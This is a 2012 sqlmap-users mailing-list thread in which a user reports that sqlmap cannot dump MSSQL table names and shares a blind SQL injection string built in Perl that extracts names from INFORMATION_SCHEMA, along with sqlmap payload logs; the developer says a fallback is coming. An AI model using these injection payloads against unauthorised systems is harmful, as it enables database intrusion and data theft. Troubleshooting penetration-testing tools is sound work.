sqlmap-users

[sqlmap-users] Can't dump tables from an mssql server

[cats <du...@al...>]

I can dump users and databases, but not the tables in any database.

Here's some output from sqlmap:

Revision: 4643

[18:58:04] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows Vista
web application technology: ASP.NET, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008

[18:58:04] [INFO] fetching tables for database: productcatalog
[18:58:04] [INFO] fetching number of tables for database
'productcatalog'
[18:58:04] [PAYLOAD] 99047' AND ASCII(SUBSTRING((SELECT
ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
eservice_productcatalog..sysobjects WHERE xtype IN
(CHAR(117),CHAR(118))),1,1)) > 51 AND 'cfIC'='cfIC
[18:58:05] [DEBUG] reflective value found and filtered out

It just goes on like this and simply spits out a "retrieved" which is
empty, and it will continue doing so until it has reached the length of
the current table. Thus the result will be something like:

dbo.""
dbo.""
dbo.""

...and so on

I wrote a Perl script that could successfully extract the tables from my
database, using the following injection string.

Clean version of the injection:

AND (
CASE 
WHEN SUBSTRING((
SELECT TOP 1 TABLE_NAME FROM (
SELECT TOP ' . $i . ' TABLE_NAME FROM
INFORMATION_SCHEMA.TABLES WHERE TABLE_CATALOG=\'' . $dbname . '\'
ORDER BY TABLE_NAME ASC) sq ORDER BY TABLE_NAME DESC),' . $nc .
',1)=char(' . ord(substr($chars,$c,1)) . ') THEN 1 ELSE 2 END)=\'1

So the important part is "SELECT TABLE_NAME FROM
INFORMATION_SCHEMA.TABLES", as "SELECT name FROM dbname..sysobjects
WHERE xtype = 'U'" Doesn't seem to work for me.

Has anyone else had this issue?
Am I doing something wrong, or is this a bug in sqlmap?
Or maybe it's the configuration on my mssql server?

Anyway, advice is welcome :-)

Cheers!

Re: [sqlmap-users] Can't dump tables from an mssql server

[Miroslav S. <mir...@gm...>]

Hi Cats.

Please, wait for day or two and you'll hopefully be able to use sqlmap in
that case too.

Kind regards,
Miroslav Stampar

On Mon, Jan 2, 2012 at 8:01 PM, cats <du...@al...> wrote:

> I can dump users and databases, but not the tables in any database.
>
> Here's some output from sqlmap:
>
> Revision: 4643
>
> [18:58:04] [INFO] the back-end DBMS is Microsoft SQL Server
> web server operating system: Windows Vista
> web application technology: ASP.NET, Microsoft IIS 7.0
> back-end DBMS: Microsoft SQL Server 2008
>
> [18:58:04] [INFO] fetching tables for database: productcatalog
> [18:58:04] [INFO] fetching number of tables for database
> 'productcatalog'
> [18:58:04] [PAYLOAD] 99047' AND ASCII(SUBSTRING((SELECT
> ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
> eservice_productcatalog..sysobjects WHERE xtype IN
> (CHAR(117),CHAR(118))),1,1)) > 51 AND 'cfIC'='cfIC
> [18:58:05] [DEBUG] reflective value found and filtered out
>
> It just goes on like this and simply spits out a "retrieved" which is
> empty, and it will continue doing so until it has reached the length of
> the current table. Thus the result will be something like:
>
> dbo.""
> dbo.""
> dbo.""
>
> ...and so on
>
> I wrote a Perl script that could successfully extract the tables from my
> database, using the following injection string.
>
> Clean version of the injection:
>
> AND (
> CASE
> WHEN SUBSTRING((
> SELECT TOP 1 TABLE_NAME FROM (
> SELECT TOP ' . $i . ' TABLE_NAME FROM
> INFORMATION_SCHEMA.TABLES WHERE TABLE_CATALOG=\'' . $dbname . '\'
> ORDER BY TABLE_NAME ASC) sq ORDER BY TABLE_NAME DESC),' . $nc .
> ',1)=char(' . ord(substr($chars,$c,1)) . ') THEN 1 ELSE 2 END)=\'1
>
> So the important part is "SELECT TABLE_NAME FROM
> INFORMATION_SCHEMA.TABLES", as "SELECT name FROM dbname..sysobjects
> WHERE xtype = 'U'" Doesn't seem to work for me.
>
> Has anyone else had this issue?
> Am I doing something wrong, or is this a bug in sqlmap?
> Or maybe it's the configuration on my mssql server?
>
> Anyway, advice is welcome :-)
>
> Cheers!
>
>
>
> ------------------------------------------------------------------------------
> Ridiculously easy VDI. With Citrix VDI-in-a-Box, you don't need a complex
> infrastructure or vast IT resources to deliver seamless, secure access to
> virtual desktops. With this all-in-one solution, easily deploy virtual
> desktops for less than the cost of PCs and save 60% on VDI infrastructure
> costs. Try it free! http://p.sf.net/sfu/Citrix-VDIinabox
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] Can't dump tables from an mssql server

[Miroslav S. <mir...@gm...>]

Hi Cats.

This should be implemented this moment (as a backup plan if normal
retrieval of table names fails for whatever (read: privileges) reason)

Kind regards,
Miroslav Stampar

On Wed, Jan 4, 2012 at 12:50 PM, Miroslav Stampar <
mir...@gm...> wrote:

> Hi Cats.
>
> Please, wait for day or two and you'll hopefully be able to use sqlmap in
> that case too.
>
> Kind regards,
> Miroslav Stampar
>
>
> On Mon, Jan 2, 2012 at 8:01 PM, cats <du...@al...> wrote:
>
>> I can dump users and databases, but not the tables in any database.
>>
>> Here's some output from sqlmap:
>>
>> Revision: 4643
>>
>> [18:58:04] [INFO] the back-end DBMS is Microsoft SQL Server
>> web server operating system: Windows Vista
>> web application technology: ASP.NET, Microsoft IIS 7.0
>> back-end DBMS: Microsoft SQL Server 2008
>>
>> [18:58:04] [INFO] fetching tables for database: productcatalog
>> [18:58:04] [INFO] fetching number of tables for database
>> 'productcatalog'
>> [18:58:04] [PAYLOAD] 99047' AND ASCII(SUBSTRING((SELECT
>> ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
>> eservice_productcatalog..sysobjects WHERE xtype IN
>> (CHAR(117),CHAR(118))),1,1)) > 51 AND 'cfIC'='cfIC
>> [18:58:05] [DEBUG] reflective value found and filtered out
>>
>> It just goes on like this and simply spits out a "retrieved" which is
>> empty, and it will continue doing so until it has reached the length of
>> the current table. Thus the result will be something like:
>>
>> dbo.""
>> dbo.""
>> dbo.""
>>
>> ...and so on
>>
>> I wrote a Perl script that could successfully extract the tables from my
>> database, using the following injection string.
>>
>> Clean version of the injection:
>>
>> AND (
>> CASE
>> WHEN SUBSTRING((
>> SELECT TOP 1 TABLE_NAME FROM (
>> SELECT TOP ' . $i . ' TABLE_NAME FROM
>> INFORMATION_SCHEMA.TABLES WHERE TABLE_CATALOG=\'' . $dbname . '\'
>> ORDER BY TABLE_NAME ASC) sq ORDER BY TABLE_NAME DESC),' . $nc .
>> ',1)=char(' . ord(substr($chars,$c,1)) . ') THEN 1 ELSE 2 END)=\'1
>>
>> So the important part is "SELECT TABLE_NAME FROM
>> INFORMATION_SCHEMA.TABLES", as "SELECT name FROM dbname..sysobjects
>> WHERE xtype = 'U'" Doesn't seem to work for me.
>>
>> Has anyone else had this issue?
>> Am I doing something wrong, or is this a bug in sqlmap?
>> Or maybe it's the configuration on my mssql server?
>>
>> Anyway, advice is welcome :-)
>>
>> Cheers!
>>
>>
>>
>> ------------------------------------------------------------------------------
>> Ridiculously easy VDI. With Citrix VDI-in-a-Box, you don't need a complex
>> infrastructure or vast IT resources to deliver seamless, secure access to
>> virtual desktops. With this all-in-one solution, easily deploy virtual
>> desktops for less than the cost of PCs and save 60% on VDI infrastructure
>> costs. Try it free! http://p.sf.net/sfu/Citrix-VDIinabox
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>



-- 
Miroslav Stampar
http://about.me/stamparm